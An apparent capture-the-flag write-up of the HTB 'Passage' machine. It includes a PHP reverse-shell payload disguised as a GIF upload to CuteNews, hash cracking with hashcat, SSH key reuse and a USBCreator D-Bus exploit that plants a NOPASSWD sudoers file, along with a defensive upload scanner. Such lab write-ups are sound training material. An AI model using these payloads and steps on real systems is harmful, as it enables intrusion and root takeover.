This is a write-up on the Passage machine challenge from HTB. For more information on challenges like these, check out my post on penetration testing.  Special thanks to HTB user ChefByzen for creating the challenge.

Getting a Foothold

nmap 10.10.10.206

A basic nmap shows the server is running ssh and a web server. Visit the website and notice it is running a CMS app called CuteNews, which has several known vulnerabilities. Browse to http://10.10.10.206/CuteNews/ in order to obtain the version number.  This page will also present an option to register for an account.  

The basis for the initial exploit involves tricking CuteNews into accepting a malicious upload and can be found here.  To begin, create a PHP file capable of creating a reverse shell when executed.  Naming the file with an image extension such as .jpg is not enough to fool the uploader.  A magic byte inserted at the beginning, however, will do the trick. Save the file below as reverse.jpg.  

GIF8;
<?php
 echo "<pre>";
 $cmd = ('nc -e /bin/bash <YOUR IP> 1234');
 system($cmd);
 echo "</pre>";
?>

In a separate window, launch a listener for the reverse shell to connect to.

nc -lnvp 1234

After registering for an account, navigate to options and then upload avatar.  Click browse and select reverse.jpg.  Before submitting, launch BurpSuite and ensure that the browser is set to proxy the request through BurpSuite.  After clicking submit, find the line below in the request and modify it so that the filename is set to reverse.php, then forward the request on.

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

After successful upload, browse to http://10.10.10.206/CuteNews/uploads/ and select the uploaded file.  This will execute the php script and launch a reverse shell.
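From the defender's side, the polyglot described above (image magic bytes followed by PHP, or an image renamed to .php on the way in) is easy to spot on disk. The following scanner is an added example, not part of the original write-up or of CuteNews; it assumes the uploads directory path is passed in by the caller and uses constructed sample files for the demo.

```python
import re
from pathlib import Path

# Magic bytes a real image of each type must start with (assumption: the
# avatar uploader is meant to accept only these formats).
IMAGE_MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def classify(name, data):
    """Return a list of findings for one uploaded file (empty when clean)."""
    findings = []
    ext = Path(name).suffix.lower()
    if ext in SCRIPT_EXTS:
        findings.append("executable extension in upload directory")
    # A bare 'GIF8;' passes a naive check but is not a valid GIF/JPEG header.
    if ext in IMAGE_MAGIC and not data.startswith(IMAGE_MAGIC[ext]):
        findings.append(f"magic bytes do not match {ext}")
    if PHP_TAG.search(data):
        findings.append("PHP open tag inside file body")
    return findings


def scan_uploads(directory):
    """Scan every regular file under `directory`; map name -> findings."""
    results = {}
    for path in sorted(Path(directory).iterdir()):
        if path.is_file():
            findings = classify(path.name, path.read_bytes())
            if findings:
                results[path.name] = findings
    return results


# Constructed samples: the write-up's polyglot, the renamed copy, a clean PNG.
SAMPLES = {
    "reverse.jpg": b"GIF8;\n<?php\n echo '<pre>';\n?>",
    "reverse.php": b"GIF8;\n<?php echo 1; ?>",
    "avatar.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
}


def demo():
    return {name: classify(name, data) for name, data in SAMPLES.items()}
```

Run scan_uploads() against a web root such as the CuteNews uploads directory as part of routine integrity checks; any file with findings warrants a look at the access log for the request that created it.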

Getting User

The reverse shell runs in the context of the web server user, which has limited privileges, but a listing of /home shows two other users, nadav and paul, to target next.

Use some basic find commands and reconnaissance techniques to arrive at the directory /var/www/html/CuteNews/cdata/users.  There is a file in the directory called lines, which contains what appear to be several lines encoded in base64.

for i in `cat lines` ; do echo $i | base64 -d; done

Among the decoded text is a line which appears to have a hashed password for user paul:

a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"[email protected]";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}

Using the hashid command, it is possible to determine that the hash is most likely SHA-256 (there are other candidates, but they are uncommon).  This can be followed with the hashcat command to crack the hash.  Note that the rockyou.txt wordlist, included with Kali, is used.

zcat /usr/share/wordlists/rockyou.txt.gz > rockyou.txt
hashid e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
hashcat -m 1400 e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd rockyou.txt

The password for user Paul turns out to be atlanta1.  In the reverse shell, run su - paul with these credentials to assume the identity of user paul and grab the user.txt file.

Note that the su command sometimes fails to run in a reverse shell due to terminal issues.  If this happens, Python to the rescue!

echo "import pty; pty.spawn('/bin/bash')" > /tmp/term.py
python /tmp/term.py

Additionally, it is possible to copy /home/paul/.ssh/id_rsa locally and use it to ssh directly to user paul.  Paul's private ssh key is also trusted by the nadav account, so it is possible to run ssh nadav@localhost when logged in as paul to assume the identity of nadav.

Getting Root

Most reconnaissance scripts will fail to highlight .viminfo in /home/nadav.  This file contains information about files the nadav user has recently edited, including /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf.  A Google search for "USBCreator vulnerability" turns up this article about privilege escalation in usbcreator on Ubuntu Desktop (notice the author's name).

Following the instructions in the article, it is possible to construct a method for exploiting the vulnerability.  Note that this must be executed as the nadav account, which has the requisite group memberships for the exploit to succeed.

First, create a sudoers fragment which allows the nadav user to run any command as root without a password.  Leverage the vulnerability to copy the file into /etc/sudoers.d and the rest is history.

echo 'nadav ALL = (root) NOPASSWD: ALL' > /tmp/nadav
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /tmp/nadav /etc/sudoers.d/nadav true
sudo su -
cat root.txt